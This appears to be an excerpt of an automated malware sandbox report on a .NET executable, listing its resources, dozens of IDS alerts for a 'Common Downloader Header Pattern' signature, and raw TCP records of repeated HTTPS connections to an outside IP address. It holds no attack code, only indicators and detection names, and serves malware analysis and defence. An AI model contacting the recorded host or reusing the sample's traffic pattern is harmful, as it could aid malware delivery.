                                          RT_ICON0x50a00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 42240.06941838649155722
                                          RT_ICON0x61480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 96000.03973029045643153
                                          RT_ICON0x86f00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 168960.029168634860651865
                                          RT_ICON0xc9180x5488Device independent bitmap graphic, 72 x 144 x 32, image size 216000.03022181146025878
                                          RT_ICON0x11da00x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 380160.019261088921589238
                                          RT_ICON0x1b2480x10828Device independent bitmap graphic, 128 x 256 x 32, image size 675840.023837690760676683
                                          RT_ICON0x2ba700x1285PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.8517190466146383
                                          RT_GROUP_ICON0x2ccf80x84data0.7272727272727273
                                          RT_VERSION0x2cd7c0x310data0.4489795918367347
                                          RT_MANIFEST0x2d08c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                          DLLImport
                                          mscoree.dll_CorExeMain
                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                          2024-12-10T16:27:29.576670+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849714194.15.112.248443TCP
                                          2024-12-10T16:27:32.526457+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849715194.15.112.248443TCP
                                          2024-12-10T16:27:35.369134+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849716194.15.112.248443TCP
                                          2024-12-10T16:27:38.316628+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849717194.15.112.248443TCP
                                          2024-12-10T16:27:41.249915+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849718194.15.112.248443TCP
                                          2024-12-10T16:27:44.172445+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849721194.15.112.248443TCP
                                          2024-12-10T16:27:47.152636+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849722194.15.112.248443TCP
                                          2024-12-10T16:27:49.988251+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849723194.15.112.248443TCP
                                          2024-12-10T16:27:52.919141+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849724194.15.112.248443TCP
                                          2024-12-10T16:27:55.868078+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849725194.15.112.248443TCP
                                          2024-12-10T16:27:58.769686+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849726194.15.112.248443TCP
                                          2024-12-10T16:28:01.651132+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849727194.15.112.248443TCP
                                          2024-12-10T16:28:04.541632+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849728194.15.112.248443TCP
                                          2024-12-10T16:28:07.439598+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849729194.15.112.248443TCP
                                          2024-12-10T16:28:10.362142+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849730194.15.112.248443TCP
                                          2024-12-10T16:28:13.255533+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849731194.15.112.248443TCP
                                          2024-12-10T16:28:16.139650+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849732194.15.112.248443TCP
                                          2024-12-10T16:28:19.004117+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849733194.15.112.248443TCP
                                          2024-12-10T16:28:21.900347+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849735194.15.112.248443TCP
                                          2024-12-10T16:28:24.793119+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849736194.15.112.248443TCP
                                          2024-12-10T16:28:27.680746+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849737194.15.112.248443TCP
                                          2024-12-10T16:28:30.557000+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849738194.15.112.248443TCP
                                          2024-12-10T16:28:33.416773+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849739194.15.112.248443TCP
                                          2024-12-10T16:28:36.346856+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849740194.15.112.248443TCP
                                          2024-12-10T16:28:39.176510+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849741194.15.112.248443TCP
                                          2024-12-10T16:28:42.030234+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849742194.15.112.248443TCP
                                          2024-12-10T16:28:45.034408+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849743194.15.112.248443TCP
                                          2024-12-10T16:28:47.921613+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849744194.15.112.248443TCP
                                          2024-12-10T16:28:51.845244+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849745194.15.112.248443TCP
                                          2024-12-10T16:28:54.729587+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849746194.15.112.248443TCP
                                          2024-12-10T16:28:57.617140+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849747194.15.112.248443TCP
                                          2024-12-10T16:29:00.497997+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849748194.15.112.248443TCP
                                          2024-12-10T16:29:03.373393+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849749194.15.112.248443TCP
                                          2024-12-10T16:29:06.254399+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849750194.15.112.248443TCP
                                          2024-12-10T16:29:09.166355+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849751194.15.112.248443TCP
                                          2024-12-10T16:29:12.107042+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849752194.15.112.248443TCP
                                          2024-12-10T16:29:15.519764+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849753194.15.112.248443TCP
                                          2024-12-10T16:29:18.516274+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849754194.15.112.248443TCP
                                          2024-12-10T16:29:21.422261+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849755194.15.112.248443TCP
                                          2024-12-10T16:29:24.320843+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849756194.15.112.248443TCP
                                          2024-12-10T16:29:27.272943+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849757194.15.112.248443TCP
                                          2024-12-10T16:29:30.163523+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849758194.15.112.248443TCP
                                          2024-12-10T16:29:33.137370+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849759194.15.112.248443TCP
                                          2024-12-10T16:29:36.051646+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849760194.15.112.248443TCP
                                          2024-12-10T16:29:38.891899+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849761194.15.112.248443TCP
                                          2024-12-10T16:29:41.778174+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849762194.15.112.248443TCP
                                          2024-12-10T16:29:44.669988+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849763194.15.112.248443TCP
                                          2024-12-10T16:29:47.540314+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849764194.15.112.248443TCP
                                          2024-12-10T16:29:50.435955+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849765194.15.112.248443TCP
                                          2024-12-10T16:29:53.312188+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849766194.15.112.248443TCP
                                          2024-12-10T16:29:56.201449+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849767194.15.112.248443TCP
                                          2024-12-10T16:29:59.185829+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849768194.15.112.248443TCP
                                          2024-12-10T16:30:02.079464+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849769194.15.112.248443TCP
                                          2024-12-10T16:30:04.971373+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849770194.15.112.248443TCP
                                          2024-12-10T16:30:08.144659+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849771194.15.112.248443TCP
                                          2024-12-10T16:30:10.962597+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849772194.15.112.248443TCP
                                          2024-12-10T16:30:13.861298+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849773194.15.112.248443TCP
                                          2024-12-10T16:30:16.740159+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849774194.15.112.248443TCP
                                          2024-12-10T16:30:19.661631+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849775194.15.112.248443TCP
                                          2024-12-10T16:30:22.805932+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849776194.15.112.248443TCP
                                          2024-12-10T16:30:25.705370+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849777194.15.112.248443TCP
                                          2024-12-10T16:30:28.588814+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849778194.15.112.248443TCP
                                          2024-12-10T16:30:31.493402+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849779194.15.112.248443TCP
                                          TimestampSource PortDest PortSource IPDest IP
                                          Dec 10, 2024 16:27:23.502171993 CET49713443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:23.502223015 CET44349713194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:23.502312899 CET49713443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:23.517067909 CET49713443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:23.517106056 CET44349713194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:25.617381096 CET44349713194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:25.617456913 CET49713443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:25.623353004 CET49713443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:25.623368979 CET44349713194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:25.623661995 CET44349713194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:25.674246073 CET49713443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:25.855422020 CET49713443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:25.899338961 CET44349713194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:26.666474104 CET44349713194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:26.666506052 CET44349713194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:26.666553020 CET49713443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:26.666580915 CET44349713194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:26.666598082 CET44349713194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:26.666646957 CET49713443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:26.688276052 CET49713443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:26.693382978 CET49714443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:26.693424940 CET44349714194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:26.693522930 CET49714443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:26.693749905 CET49714443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:26.693767071 CET44349714194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:28.775978088 CET44349714194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:28.778312922 CET49714443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:28.778342009 CET44349714194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:29.576689005 CET44349714194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:29.576733112 CET44349714194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:29.576798916 CET44349714194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:29.576853991 CET49714443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:29.576886892 CET49714443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:29.577449083 CET49714443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:29.577989101 CET49715443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:29.578033924 CET44349715194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:29.578257084 CET49715443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:29.578563929 CET49715443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:29.578578949 CET44349715194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:31.699012041 CET44349715194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:31.700697899 CET49715443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:31.700725079 CET44349715194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:32.526468992 CET44349715194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:32.526503086 CET44349715194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:32.526555061 CET49715443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:32.526568890 CET44349715194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:32.526607990 CET49715443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:32.527129889 CET49715443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:32.527764082 CET49716443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:32.527818918 CET44349716194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:32.527889967 CET49716443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:32.528177023 CET49716443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:32.528188944 CET44349716194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:34.606102943 CET44349716194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:34.607884884 CET49716443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:34.607914925 CET44349716194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:35.369151115 CET44349716194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:35.369183064 CET44349716194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:35.369252920 CET44349716194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:35.369311094 CET49716443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:35.369343996 CET49716443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:35.373265982 CET49716443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:35.374243975 CET49717443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:35.374295950 CET44349717194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:35.374380112 CET49717443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:35.374619007 CET49717443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:35.374646902 CET44349717194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:37.527875900 CET44349717194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:37.529774904 CET49717443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:37.529802084 CET44349717194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:38.316664934 CET44349717194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:38.316688061 CET44349717194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:38.316749096 CET44349717194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:38.316870928 CET49717443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:38.317486048 CET49717443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:38.318089962 CET49718443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:38.318119049 CET44349718194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:38.318190098 CET49718443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:38.318429947 CET49718443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:38.318442106 CET44349718194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:40.434689999 CET44349718194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:40.436394930 CET49718443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:40.436424017 CET44349718194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:41.249938011 CET44349718194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:41.249969959 CET44349718194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:41.250039101 CET44349718194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:41.250061035 CET49718443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:41.250124931 CET49718443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:41.251121044 CET49718443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:41.251120090 CET49721443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:41.251188040 CET44349721194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:41.251285076 CET49721443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:41.254442930 CET49721443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:41.254467964 CET44349721194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:43.365931034 CET44349721194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:43.368143082 CET49721443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:43.368201017 CET44349721194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:44.172467947 CET44349721194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:44.172494888 CET44349721194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:44.172545910 CET44349721194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:44.172568083 CET49721443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:44.172606945 CET49721443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:44.173172951 CET49721443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:44.173724890 CET49722443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:44.173768044 CET44349722194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:44.173968077 CET49722443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:44.174190044 CET49722443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:44.174201965 CET44349722194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:46.365387917 CET44349722194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:46.367031097 CET49722443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:46.367047071 CET44349722194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:47.152662039 CET44349722194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:47.152695894 CET44349722194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:47.152812958 CET49722443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:47.152842999 CET44349722194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:47.152879953 CET44349722194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:47.152931929 CET49722443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:47.153529882 CET49722443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:47.154120922 CET49723443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:47.154165030 CET44349723194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:47.154236078 CET49723443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:47.154448986 CET49723443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:47.154454947 CET44349723194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:49.184962988 CET44349723194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:49.186834097 CET49723443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:49.186846018 CET44349723194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:49.988277912 CET44349723194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:49.988312960 CET44349723194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:49.988373995 CET44349723194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:49.988383055 CET49723443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:49.988416910 CET49723443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:49.988944054 CET49723443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:49.989525080 CET49724443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:49.989559889 CET44349724194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:49.993688107 CET49724443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:49.993921995 CET49724443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:49.993936062 CET44349724194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:52.115442038 CET44349724194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:52.117230892 CET49724443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:52.117261887 CET44349724194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:52.919153929 CET44349724194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:52.919187069 CET44349724194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:52.919249058 CET44349724194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:52.919287920 CET49724443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:52.919323921 CET49724443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:52.919975996 CET49724443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:52.920556068 CET49725443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:52.920598030 CET44349725194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:52.920679092 CET49725443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:52.920908928 CET49725443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:52.920927048 CET44349725194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:55.062918901 CET44349725194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:55.064440012 CET49725443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:55.064455032 CET44349725194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:55.868107080 CET44349725194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:55.868133068 CET44349725194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:55.868201017 CET44349725194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:55.868355989 CET49725443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:55.868355989 CET49725443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:55.868668079 CET49725443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:55.869282961 CET49726443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:55.869322062 CET44349726194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:55.871138096 CET49726443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:55.871339083 CET49726443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:55.871351004 CET44349726194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:57.970067978 CET44349726194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:57.972023964 CET49726443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:57.972047091 CET44349726194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:58.769705057 CET44349726194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:58.769761086 CET44349726194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:58.769824982 CET44349726194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:58.769854069 CET49726443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:58.769891024 CET49726443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:58.770376921 CET49726443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:58.770934105 CET49727443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:58.770970106 CET44349727194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:27:58.771078110 CET49727443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:58.771275997 CET49727443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:27:58.771287918 CET44349727194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:00.843348980 CET44349727194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:00.846641064 CET49727443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:00.846682072 CET44349727194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:01.651154995 CET44349727194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:01.651190996 CET44349727194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:01.651263952 CET44349727194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:01.651307106 CET49727443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:01.651356936 CET49727443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:01.651921988 CET49727443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:01.652420044 CET49728443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:01.652456045 CET44349728194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:01.654508114 CET49728443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:01.654773951 CET49728443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:01.654793978 CET44349728194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:03.736123085 CET44349728194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:03.738080978 CET49728443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:03.738106966 CET44349728194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:04.541651964 CET44349728194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:04.541686058 CET44349728194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:04.541764021 CET44349728194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:04.541807890 CET49728443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:04.541832924 CET49728443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:04.542392969 CET49728443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:04.542953968 CET49729443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:04.542994976 CET44349729194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:04.543104887 CET49729443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:04.543337107 CET49729443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:04.543349028 CET44349729194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:06.623861074 CET44349729194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:06.625663042 CET49729443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:06.625684023 CET44349729194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:07.439620018 CET44349729194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:07.439644098 CET44349729194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:07.439733028 CET44349729194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:07.439748049 CET49729443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:07.439779997 CET49729443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:07.440263987 CET49729443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:07.440776110 CET49730443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:07.440830946 CET44349730194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:07.440916061 CET49730443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:07.441123962 CET49730443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:07.441143036 CET44349730194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:09.532721043 CET44349730194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:09.539499044 CET49730443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:09.539526939 CET44349730194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:10.362154007 CET44349730194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:10.362179041 CET44349730194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:10.362243891 CET49730443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:10.362250090 CET44349730194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:10.362302065 CET49730443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:10.362736940 CET49730443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:10.363424063 CET49731443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:10.363462925 CET44349731194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:10.363532066 CET49731443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:10.363811970 CET49731443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:10.363820076 CET44349731194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:12.457000971 CET44349731194.15.112.248192.168.2.8
